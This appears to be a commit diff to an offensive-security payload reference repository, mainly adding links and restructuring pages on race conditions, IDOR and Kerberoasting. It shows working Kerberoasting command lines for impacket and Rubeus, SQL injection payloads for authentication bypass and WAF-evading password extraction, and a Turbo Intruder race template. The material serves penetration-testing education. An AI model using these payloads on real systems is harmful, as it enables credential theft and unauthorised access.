Race Condition WIP + AD asreproast/kerberoasting

File Inclusion/README.md

@@ -515,3 +515,4 @@ If SSH is active check which user is being used `/proc/self/status` and `/etc/pa
 * [Solving "includer's revenge" from hxp ctf 2021 without controlling any files - @loknop](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d)
 * [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - 18/10/2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
 * [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - 21/03/2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
+* [One Line PHP: From Genesis to Ragnarök - Ginoah, Bookgin](https://hackmd.io/@ginoah/phpInclude#/)

Insecure Direct Object References/README.md

@@ -61,7 +61,8 @@ Increment and decrement these values to access sensitive informations.
 * Hexadecimal: `0x4642d`, `0x4642e`, `0x4642f`, ...
 * Unix epoch timestamp: `1695574808`, `1695575098`, ...
 
-**Examples**
+**Examples** 
+
 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
 * [HackerOne - Delete messages via IDOR - naaash](https://hackerone.com/reports/697412)
 
@@ -73,7 +74,8 @@ Some identifiers can be guessed like names and emails, they might grant you acce
 * Email: `[email protected]`
 * Base64 encoded value: `am9obi5kb2VAbWFpbC5jb20=`
 
-**Examples**
+**Examples** 
+
 * [HackerOne - Insecure Direct Object Reference (IDOR) - Delete Campaigns - datph4m](https://hackerone.com/reports/1969141)
 
 
@@ -86,7 +88,8 @@ Some identifiers can be guessed like names and emails, they might grant you acce
     * a 2-byte process id
     * a 3-byte counter, starting with a random value
 
-**Examples**
+**Examples** 
+
 * [HackerOne - IDOR allowing to read another user's token on the Social Media Ads service - a_d_a_m](https://hackerone.com/reports/1464168)
 * [IDOR through MongoDB Object IDs Prediction](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
 
@@ -99,7 +102,8 @@ Sometimes we see websites using hashed values to generate a random user id or to
 * SHA1: `a94a8fe5ccb19ba61c4c0873d391e987982fbbd3`
 * SHA2: `9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08`
 
-**Examples**
+**Examples** 
+
 * [IDOR with Predictable HMAC Generation - DiceCTF 2022 - CryptoCat](https://youtu.be/Og5_5tEg6M0)
 
 
@@ -113,7 +117,8 @@ Send a wilcard instead of an ID, some backend might respond with the data of all
 * `GET /api/users/. HTTP/1.1`
 
 
-**Examples**
+**Examples** 
+
 * [TODO]()
 
 

Methodology and Resources/Active Directory Attack.md

@@ -60,7 +60,7 @@
     - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets)
   - [Kerberoasting](#kerberoasting)
   - [KRB_AS_REP Roasting](#krb_as_rep-roasting)
-  - [Kerberoasting w/o domain account](#kerberoast-without-preauth)
+  - [Kerberoasting w/o domain account](#kerberoasting-wo-domain-account)
   - [CVE-2022-33679](#cve-2022-33679)
   - [Timeroasting](#timeroasting)
   - [Pass-the-Hash](#pass-the-hash)
@@ -1987,21 +1987,24 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
 **Mitigations**: 
 * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).
 
+
 ## Kerberoasting w/o domain account
 
-In September 2022 a vulnerability was discovered by [Charlie Clark](https://exploit.ph/), ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account.
-If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an KRB_AS_REQ request and trick the request to ask for a ST instead for a kerberoastable principal, by modifying the sname attribut in the req-body part of the request.
+> In September 2022 a vulnerability was discovered by [Charlie Clark](https://exploit.ph/), ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account. If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an **KRB_AS_REQ** request and trick the request to ask for a **ST** instead of a **encrypted TGT**, by modifying the **sname** attribute in the req-body part of the request.
 
 The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
 
-* [GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413)
-```powershell
-GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
-```
+:warning: You must provide a list of users because we don't have a valid account to query the LDAP using this technique.
+
+* [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413)
+  ```powershell
+  GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
+  ```
+* [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139)
+  ```powershell
+  Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
+  ```
 
-* [Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139)
-```powershell
-Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
 
 ## CVE-2022-33679
 

Prototype Pollution/README.md

@@ -71,6 +71,7 @@ Object.constructor["prototype"]["evilProperty"]="evilPayload"
 ## References
 
 * [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/)
+* [Prototype Pollution and Where to Find Them - BitK & SakiiR - AUGUST 14, 2023](https://youtu.be/mwpH9DF_RDA)
 * [Prototype Pollution - PortSwigger](https://portswigger.net/web-security/prototype-pollution)
 * [A Pentester’s Guide to Prototype Pollution Attacks - HARSH BOTHRA - JAN 2, 2023](https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks)
 * [Prototype pollution - Snyk](https://learn.snyk.io/lessons/prototype-pollution/javascript/)

Race Condition/README.md

@@ -7,15 +7,48 @@
 - [Race Condition](#race-condition)
   - [Summary](#summary)
   - [Tools](#tools)
-  - [Turbo Intruder Examples](#turbo-intruder-examples)
-  - [Turbo Intruder 2 Requests Examples](#turbo-intruder-2-requests-examples)
+  - [Labs](#labs)
+  - [Limit-overrun](#limit-overrun)
+  - [Rate-limit bypass](#rate-limit-bypass)
+  - [Turbo Intruder](#turbo-intruder)
+    - [Example 1](#example-1)
+    - [Example 2](#example-2)
   - [References](#references)
 
+
 ## Tools
 
 * [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder)
 
-## Turbo Intruder Examples
+
+## Labs
+
+* [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun)
+
+
+## Limit-overrun
+
+TODO
+
+**Examples**:
+
+* [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
+* [Race conditions can be used to bypass invitation limit - @franjkovic](https://hackerone.com/reports/115007)
+* [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609)
+
+
+## Rate-limit bypass
+
+TODO
+
+**Examples**:
+
+* []()
+
+
+## Turbo Intruder
+
+### Example 1
 
 1. Send request to turbo intruder
 2. Use this python code as a payload of the turbo intruder
@@ -44,8 +77,11 @@
 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
 4. Click "Attack"
 
-## Turbo Intruder 2 Requests Examples
+
+### Example 2
+
 This following template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
+
 ```python
 def queueRequests(target, wordlists): 
     engine = RequestEngine(endpoint=target.endpoint, 
@@ -78,6 +114,8 @@ def handleResponse(req, interesting):
 
 ## References
 
-* [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
-* [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
-* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
+* [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle](https://youtu.be/tKJzsaB1ZvI)
+* [Turbo Intruder: Embracing the billion-request attack - James Kettle - 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
+* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - Apr 24, 2018](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
+* [Race conditions on the web - Josip Franjkovic - July 12th, 2016](https://www.josipfranjkovic.com/blog/race-conditions-on-web)
+* [New techniques and tools for web race conditions - Emma Stocks - 10 August 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions)

SQL Injection/MySQL Injection.md

@@ -614,17 +614,17 @@ mysql> mysql> select version();
 In MySQL, the e notation is used to represent numbers in scientific notation. It's a way to express very large or very small numbers in a concise format. The e notation consists of a number followed by the letter e and an exponent.
 The format is: `base 'e' exponent`.
 
-For example:
-* `1e3` represents `1 x 10^3` which is `1000`.
-* `1.5e3` represents `1.5 x 10^3` which is `1500`.
-* `2e-3` represents `2 x 10^-3` which is `0.002`.
+For example: 
+* `1e3` represents `1 x 10^3` which is `1000`. 
+* `1.5e3` represents `1.5 x 10^3` which is `1500`. 
+* `2e-3` represents `2 x 10^-3` which is `0.002`. 
 
-The following queries are equivalent:
-* `SELECT table_name FROM information_schema 1.e.tables`
-* `SELECT table_name FROM information_schema .tables`
+The following queries are equivalent: 
+* `SELECT table_name FROM information_schema 1.e.tables` 
+* `SELECT table_name FROM information_schema .tables` 
 
-In the same way, the common payload to bypass authentication `' or ''='` is equivalent to `' or 1.e('')='` and `1' or 1.e(1) or '1'='1`.
-This technique can be used to obfuscate queries to bypass WAF, for example: `1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2`
+In the same way, the common payload to bypass authentication `' or ''='` is equivalent to `' or 1.e('')='` and `1' or 1.e(1) or '1'='1`. 
+This technique can be used to obfuscate queries to bypass WAF, for example: `1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2` 
 
 
 ### Conditional Comments